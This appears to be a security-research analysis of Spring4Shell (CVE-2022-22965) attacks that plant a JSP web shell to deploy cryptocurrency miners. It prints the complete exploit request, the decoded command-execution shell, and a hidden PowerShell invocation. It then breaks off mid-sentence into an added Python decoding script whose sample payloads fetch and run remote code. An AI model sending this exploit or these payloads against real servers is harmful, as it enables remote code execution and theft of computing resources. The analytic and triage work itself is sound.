Analyzing Attempts to Exploit the Spring4Shell Vulnerability CVE-2022-22965 to Deploy Cryptocurrency Miners


Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners.

The following HTTP request is used to create the web shell. Its query string walks from the Spring-bound bean through class.module.classLoader to the Tomcat host's first pipeline valve (the AccessLogValve on a default install) and sets the access log's directory, file prefix, suffix and line pattern, so that the request is logged straight into a JSP file under webapps/ROOT:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1
Host: <redacted>:<redacted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X: <%
Y: Runtime
Z: %>//
Accept-Encoding: gzip

The pattern parameter carries the web shell's content, URL-encoded:

%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di

After decoding, the resulting payload is a Spring4Shell web shell. The %{x}i and %{z}i tokens are AccessLogValve header references: when the valve writes the log line, it replaces them with the values of the X and Z request headers, <% and %>//, so the file that lands on disk is a valid JSP:

%{x}i try {Runtime.getRuntime().exec(System.getProperty("os.name").contains("ndo") ? new String[]{"cmd.exe", "/c", request.getParameter("w")} : new String[]{"/bin/sh", "-c", request.getParameter("l")});} catch (Exception e) {};out.print("@pong"); %{z}i

The web shell decides at run time which operating system it is running on: it checks whether the os.name system property contains the string "ndo" (as in "Windows"). If it does, the host is treated as Windows-based and the command is run through cmd.exe /c, taking its argument from the w parameter; otherwise the host is treated as Linux-based and the command is run through /bin/sh -c, taking its argument from the l parameter. The exception handler is empty, so a failed command still returns the "@pong" marker that the attackers use to confirm the shell is alive.

The attackers then invoke the web shell. The exploit uniform resource identifier (URI), containing the web shell path and both payload parameters (the shell itself picks the one matching the host), is shown in the following code:

/zbc0fb.jsp?w=powershell.exe+-NonI+-W+Hidden+-NoP+-Exec+Bypass+-Enc+<base64 encoded content> &l=echo+<base64 encoded content>  

The web shell is identified as zbc0fb.jsp (the prefix and suffix set in the exploit request), while the parameters w and l carry, respectively, the Windows and Linux payloads, both Base64-encoded.

PowerShell is then executed with the following parameters:

-NonI: run a noninteractive session.
-W Hidden: hide the window (WindowStyle).
-NoP:
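Decoding what the w and l parameters actually carry is the next triage step, and the one detail that trips people up is that PowerShell's -Enc (short for -EncodedCommand) takes Base64 of the command encoded as UTF-16LE, so a plain Base64 decode shows the text interleaved with NUL bytes. The following is an added Python example, not code from the post: it builds a constructed invocation URI in the shape shown above using stand-in payloads (example.invalid URLs chosen here, since the post redacts the real ones), then decodes both parameters back to readable commands.

```python
import base64
import re
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Constructed sample payloads; the real ones are redacted in the post.
SAMPLE_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')"
SAMPLE_SH = "curl -s http://example.invalid/m.sh | sh"

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
# The argument is Base64 of the command as UTF-16LE, not UTF-8.
PS_ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+(\S+)", re.IGNORECASE)
# Linux side in the post starts with "echo <base64>".
ECHO_B64 = re.compile(r"echo\s+([A-Za-z0-9+/=]+)")


def build_sample_uri() -> str:
    """Construct an invocation URI in the shape seen in the post."""
    ps_b64 = base64.b64encode(SAMPLE_PS.encode("utf-16le")).decode("ascii")
    sh_b64 = base64.b64encode(SAMPLE_SH.encode("utf-8")).decode("ascii")
    win = f"powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc {ps_b64}"
    lin = f"echo {sh_b64}"
    # quote_plus turns spaces into '+' and protects the '+' and '/' of Base64.
    return f"/zbc0fb.jsp?w={quote_plus(win, safe='')}&l={quote_plus(lin, safe='')}"


def _pad(blob: str) -> str:
    """Restore Base64 padding that attackers or log truncation may have stripped."""
    return blob + "=" * (-len(blob) % 4)


def decode_powershell_enc(cmdline: str):
    """Return the command hidden behind -Enc, or None if the flag is absent."""
    m = PS_ENC_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(_pad(m.group(1))).decode("utf-16le")


def decode_echoed_base64(cmdline: str):
    """Return the Base64 blob following 'echo', decoded as UTF-8, or None."""
    m = ECHO_B64.search(cmdline)
    if not m:
        return None
    return base64.b64decode(_pad(m.group(1))).decode("utf-8", errors="replace")


def triage_webshell_call(uri: str) -> dict:
    """Break an invocation URI into shell name and decoded per-OS payloads."""
    parts = urlsplit(uri)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    win = params.get("w", "")
    lin = params.get("l", "")
    return {
        "shell": parts.path.rsplit("/", 1)[-1],
        "windows_cmdline": win,
        "windows_decoded": decode_powershell_enc(win),
        "linux_cmdline": lin,
        "linux_decoded": decode_echoed_base64(lin),
    }


if __name__ == "__main__":
    for key, value in triage_webshell_call(build_sample_uri()).items():
        print(f"{key}: {value}")
```

The -Enc regex is deliberately tolerant of the flag's short forms, and both decoders re-pad the Base64 before decoding, because access logs and proxies often truncate or strip trailing "=" characters. Feed triage_webshell_call the raw request path from a web server log to recover the commands without ever executing them.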
